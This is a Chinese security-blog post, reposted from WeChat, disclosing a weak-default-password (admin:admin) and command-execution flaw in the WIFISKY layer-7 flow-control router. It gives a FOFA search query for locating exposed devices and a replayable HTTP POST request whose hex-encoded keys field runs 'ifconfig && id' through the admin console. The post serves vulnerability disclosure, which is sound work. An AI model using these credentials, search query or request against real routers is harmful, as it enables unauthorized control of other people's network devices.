WIFISKY 7层流控路由器弱口令&命令执行漏洞

admin 2021年7月14日10:01:46评论1,203 views字数 1187阅读3分57秒阅读模式

编者注

广诚市保卫者

漏洞暂时没有漏洞编号,

01

漏洞描述                                                      

深圳市领空技术有限公司(简称“领空技术”)是扎根深圳辐射全球的网络通讯设备供应商,研发范围涵盖:AC、AP、路由、网桥、中继、网卡等网络通讯产品。

其产品WIFISKY 7层流控路由器默认账号密码admin:admin,并且进入后台可以执行系统命令

攻击路径

远程

攻击复杂度

权限要求

高权限

用户交互

不需要

02

搜索规则                                                      

fofa

title=="WIFISKY 7层流控路由器"

03

靶标环境                                                      

暂无

04

漏洞复现                                                      

访问页面如下:

WIFISKY 7层流控路由器弱口令&命令执行漏洞

输入账号密码会自动提醒默认密码需要修改:

WIFISKY 7层流控路由器弱口令&命令执行漏洞

在系统维护->命令控制台中进行执行命令,输入系统自带 ifconfig + "&& id" 就可以获取系统权限情况。

WIFISKY 7层流控路由器弱口令&命令执行漏洞

由于ifconfig内容过多,所以拉到最下面可以看到id命令执行成功。

WIFISKY 7层流控路由器弱口令&命令执行漏洞

本身使用的js来进行动态请求,导致操作较卡。可以直接获取对应的包重放。

POST /console/? HTTP/1.1Host: {目标ip地址}Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: SESSID=xxxUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 86

width=213&height=22&session={session信息}&keys=6966636F6E6669672026262069640D

其中 {目标ip地址} {session信息} 需要修改,默认情况 6966636F6E6669672026262069640D对应的是 "ifconfig && id",这里0D是判断回车状态,所以每次发送结尾跟0D即可执行。



05

参考资料                                                      

https://quake.360.cn/quake/#/vulDetail/QH-202106-1447/front


广诚市保卫者

在平行世界的另一头“广诚市”上演着一幕幕黑客围城。

WIFISKY 7层流控路由器弱口令&命令执行漏洞

长按二维码关注

WIFISKY 7层流控路由器弱口令&命令执行漏洞

发现“分享”“赞”了吗,戳我看看吧



本文始发于微信公众号(广诚市保卫者):WIFISKY 7层流控路由器弱口令&命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月14日10:01:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WIFISKY 7层流控路由器弱口令&命令执行漏洞http://cn-sec.com/archives/421736.html

发表评论

匿名网友 填写信息